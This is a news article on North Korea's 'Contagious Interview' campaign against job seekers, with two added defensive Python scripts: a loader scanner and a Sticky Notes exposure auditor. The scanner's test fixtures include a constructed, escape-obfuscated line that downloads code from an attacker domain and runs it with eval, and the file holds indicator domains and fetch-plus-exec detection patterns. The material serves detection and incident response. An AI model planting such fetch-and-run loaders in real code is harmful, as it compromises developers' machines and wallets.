North Korean Hackers Target Job Seekers with Fake FreeConference App

North Korean threat actors have been observed using a counterfeit Windows video conferencing application impersonating FreeConference.com to infect developer systems, as part of an ongoing financially motivated campaign tracked as Contagious Interview.


The latest wave of attacks, discovered by Singapore-headquartered Group-IB in mid-August 2024, is further evidence that the threat actors are relying on native installers for Windows and Apple macOS to deliver malware.

Contagious Interview, also known as DEV#POPPER, is a malicious campaign orchestrated by a North Korean threat group identified by CrowdStrike as Famous Chollima.

The attack chain begins with a fake job interview that tricks applicants into downloading and running a Node.js project containing the BeaverTail downloader. BeaverTail then deploys InvisibleFerret, a cross-platform Python backdoor with remote control, keylogging, and browser-data theft capabilities.


Some versions of BeaverTail, which also functions as an information stealer, have been distributed as JavaScript malware via fake npm packages presented as a technical assessment during the interview process.

That changed in July 2024, when Windows MSI installers and Apple macOS disk image (DMG) files masquerading as the legitimate MiroTalk video conferencing software were spotted in the wild delivering an updated version of BeaverTail.

Group-IB's latest findings, which attribute the campaign to the Lazarus Group, indicate that the threat actors are continuing to use this distribution vector, changing only the installer ("FCCCall.msi") so that it mimics FreeConference.com rather than MiroTalk.

The fake installer is believed to be downloaded from a site named freeconference[.]io, which uses the same registrar as the bogus mirotalk[.]net domain.

“Apart from LinkedIn, Lazarus is actively scouting for potential victims on other job hunting platforms like WWR, Moonlight, Upwork, and similar sites,” remarked security analyst Sharmine Low.

“Once initial contact is made, they frequently urge the candidates to shift the conversation onto Telegram, where they request the potential candidates to download a video conferencing application or a Node.js project to perform a technical assignment as part of the interview process.”

In a sign that the campaign is being actively refined, the attackers have also been observed embedding the malicious JavaScript in repositories related to cryptocurrency and gaming, with the code designed to fetch the BeaverTail JavaScript payload from the domains ipcheck[.]cloud or regioncheck[.]net.

This pattern was also recently highlighted by the cybersecurity firm Phylum in connection with an npm package named helmet-validate, suggesting that the threat actors are running multiple distribution channels in parallel.
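The practical question for anyone who has been handed a "take-home assignment" repository or an unfamiliar npm dependency is how to spot a loader of this kind before running it. The script below is an added example written for this article, not tooling from Group-IB or Phylum. The only facts it takes from the report are the four domains listed; the fetch-plus-dynamic-execution heuristic, the escape-decoding step and the three sample files it scans are constructed assumptions for illustration.

```python
"""Triage Node.js project files for BeaverTail-style loaders.

Added example, not Group-IB's or Phylum's tooling. Only the four domains
below come from the article; the heuristics and samples are assumptions.
"""
from __future__ import annotations

import os
import re
import tempfile

# Domains named in the article (defanged there as ipcheck[.]cloud etc.).
IOC_DOMAINS = ("ipcheck.cloud", "regioncheck.net", "freeconference.io", "mirotalk.net")

# Loader heuristic (assumption): a file that both pulls content from the network
# and hands a string to the JS engine for execution deserves a human look.
FETCH_RE = re.compile(r"\b(?:axios\.get|fetch|https?\.get|request)\s*\(")
EXEC_RE = re.compile(r"\b(?:eval|new\s+Function|vm\.runIn\w+Context|child_process)\b")

# Obfuscated samples often spell strings as \xNN / \uNNNN escapes; decode them
# before matching so a domain hidden as \x69\x70... is still recognised.
ESC_RE = re.compile(r"\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})")


def normalize(source: str) -> str:
    """Decode hex/unicode string escapes so obfuscated literals become readable."""
    return ESC_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), source)


def scan_source(source: str) -> list[str]:
    """Return the findings for one JavaScript/JSON source text."""
    text = normalize(source)
    findings = [f"ioc-domain:{d}" for d in IOC_DOMAINS if d in text]
    if FETCH_RE.search(text) and EXEC_RE.search(text):
        findings.append("remote-fetch+dynamic-exec")
    return findings


def scan_tree(root: str) -> dict[str, list[str]]:
    """Walk a project, node_modules included, since malicious packages live there."""
    results: dict[str, list[str]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith((".js", ".cjs", ".mjs", ".json")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_source(fh.read())
            if hits:
                results[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return results


# Constructed sample files (not real BeaverTail code): one benign, one with an
# escape-obfuscated IoC domain, one with a generic fetch-then-execute loader.
SAMPLES = {
    "src/index.js": "const express = require('express');\nmodule.exports = express();\n",
    "node_modules/some-dep/lib/init.js":
        "const h = '\\x69\\x70\\x63\\x68\\x65\\x63\\x6b\\x2e\\x63\\x6c\\x6f\\x75\\x64';\n"
        "const axios = require('axios');\n"
        "axios.get('https://' + h + '/p').then(r => eval(r.data));\n",
    "scripts/update.js":
        "fetch('https://example.test/bundle').then(r => r.text()).then(s => new Function(s)());\n",
}


def demo() -> dict[str, list[str]]:
    """Write the constructed samples to a temp dir and scan them."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLES.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)


if __name__ == "__main__":
    for path, hits in demo().items():
        print(f"{path}: {', '.join(hits)}")
```

The domain matches are high-confidence indicators; the fetch-plus-eval heuristic is only a triage signal and will also flag some legitimate build tooling, so treat its hits as a reason to read the file, not as a verdict. Point `scan_tree` at the extracted project directory before running `npm install`, since install-time scripts are exactly where such loaders execute.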

BeaverTail has also been updated to extract data from additional cryptocurrency wallet browser extensions, including Kaikas, Rabby, Argent X, and Exodus Web3, and to establish persistence using AnyDesk.

BeaverTail's information-stealing features are now implemented through a set of Python scripts collectively named CivetQ, which can capture cookies, web browser data, keystrokes, and clipboard contents, and deliver additional scripts. The malware targets a total of 74 browser extensions.

“Through coordination with the application’s SQLite database files situated at `%LocalAppData%\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite`, where user notes are kept in plain text format, the malware can extract data from Microsoft Sticky Notes,” revealed Low.

“By fetching and extracting data from this database, the malware can access and leak sensitive information stored in the victim’s Sticky Notes application.”
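For incident scoping, the useful follow-up to the Sticky Notes finding is to establish what a compromised host would actually have leaked from that database. The script below is an added example for that purpose, not the malware's code and not from Group-IB. The only fact it takes from the article is the plum.sqlite location; the schema it queries (table Note, column Text), the secret-looking patterns it flags and the sample notes it builds are assumptions constructed for this example.

```python
"""Scope what a Sticky Notes database would have exposed to a stealer like CivetQ.

Added example for incident scoping; not the malware's code. The database
location is the one quoted in the article. The schema (Note.Text), the
secret-looking patterns and the sample notes are assumptions.
"""
from __future__ import annotations

import os
import pathlib
import re
import shutil
import sqlite3
import tempfile

# Path quoted in the article; expandvars resolves %LocalAppData% on Windows.
STICKY_DB = os.path.expandvars(
    r"%LocalAppData%\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite"
)

# Assumed schema: one row per note, body stored as plain text in Note.Text.
NOTE_QUERY = "SELECT Id, Text FROM Note"

# Heuristics (assumptions) for note bodies a victim would not want exfiltrated.
SECRET_PATTERNS = {
    "password-label": re.compile(r"\b(?:pass(?:word|wd)?|pwd|pin)\b\s*[:=]", re.I),
    "wallet-recovery": re.compile(r"\b(?:seed|recovery|mnemonic)\s+(?:phrase|words?)\b", re.I),
    "private-key": re.compile(r"BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY|\b0x[0-9a-f]{64}\b", re.I),
    "api-token": re.compile(r"\b(?:api[_-]?key|token|secret)\b\s*[:=]", re.I),
}


def classify(text: str) -> list[str]:
    """Return the categories of sensitive-looking content found in one note body."""
    hits = [name for name, rx in SECRET_PATTERNS.items() if rx.search(text)]
    words = text.split()
    # A bare 12- or 24-word lowercase list is the usual shape of a BIP-39 seed phrase.
    if len(words) in (12, 24) and all(w.isalpha() and w.islower() for w in words):
        hits.append("bip39-like-word-list")
    return hits


def audit(db_path: str) -> list[tuple[str, list[str]]]:
    """List notes with sensitive-looking content from a Sticky Notes database.

    The database is copied before it is opened: the running app may hold a
    lock, and reading a copy leaves the original untouched as evidence. The
    -wal/-shm side files are copied too so recently written notes are included.
    """
    with tempfile.TemporaryDirectory() as tmp:
        copy = os.path.join(tmp, "plum.sqlite")
        for suffix in ("", "-wal", "-shm"):
            if os.path.exists(db_path + suffix):
                shutil.copy2(db_path + suffix, copy + suffix)
        uri = pathlib.Path(copy).as_uri() + "?mode=ro"
        conn = sqlite3.connect(uri, uri=True)
        try:
            rows = conn.execute(NOTE_QUERY).fetchall()
        finally:
            conn.close()
    flagged = []
    for note_id, text in rows:
        hits = classify(text or "")
        if hits:
            flagged.append((note_id, hits))
    return flagged


# Constructed sample notes mirroring the assumed schema (not real user data).
SAMPLE_NOTES = [
    ("n1", "milk, eggs, coffee"),
    ("n2", "wifi password: hunter2"),
    ("n3", "abandon ability able about above absent absorb abstract absurd abuse access accident"),
    ("n4", "ledger recovery phrase is in the safe"),
]


def build_sample_db(path: str) -> None:
    """Create a small database with the assumed Note(Id, Text) layout."""
    conn = sqlite3.connect(path)
    with conn:
        conn.execute("CREATE TABLE Note (Id TEXT PRIMARY KEY, Text TEXT)")
        conn.executemany("INSERT INTO Note VALUES (?, ?)", SAMPLE_NOTES)
    conn.close()


def demo() -> list[tuple[str, list[str]]]:
    """Build the sample database in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "plum.sqlite")
        build_sample_db(path)
        return audit(path)


if __name__ == "__main__":
    results = audit(STICKY_DB) if os.path.exists(STICKY_DB) else demo()
    for note_id, hits in results:
        print(f"{note_id}: {', '.join(hits)}")
```

Run it against the user profile of an affected machine to turn "Sticky Notes was readable" into a concrete list of credentials and wallet material that must be rotated or moved. The patterns err on the side of flagging, which is the right bias when scoping a credential-theft incident.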


The introduction of CivetQ points to a modular approach and shows that the toolset has been evolving steadily in small increments over recent months.

“Lazarus has revamped their strategies, enhanced their tools, and identified better methods to mask their actions,” mentioned Low. “They indicate no signs of slowing down, with their operation targeting job seekers stretching into 2024 and beyond. Their attacks have grown more inventive, expanding their influence across multiple platforms.”

The disclosure coincides with a warning from the U.S. Federal Bureau of Investigation (FBI) about North Korean cyber actors' aggressive targeting of the cryptocurrency industry through “well-disguised” social engineering aimed at facilitating cryptocurrency theft.

“North Korean social engineering tactics are intricate and elaborate, often targeting victims possessing advanced technical knowledge,” stated the FBI in a notice released recently, noting that the threat actors single out potential victims by scrutinizing their activities on professional networking or employment-oriented platforms.

“Groups of North Korean malicious cyber actors identify particular DeFi or cryptocurrency-oriented businesses to target and endeavor to socially engineer numerous employees from these companies to secure unauthorized access to the firm’s network.”
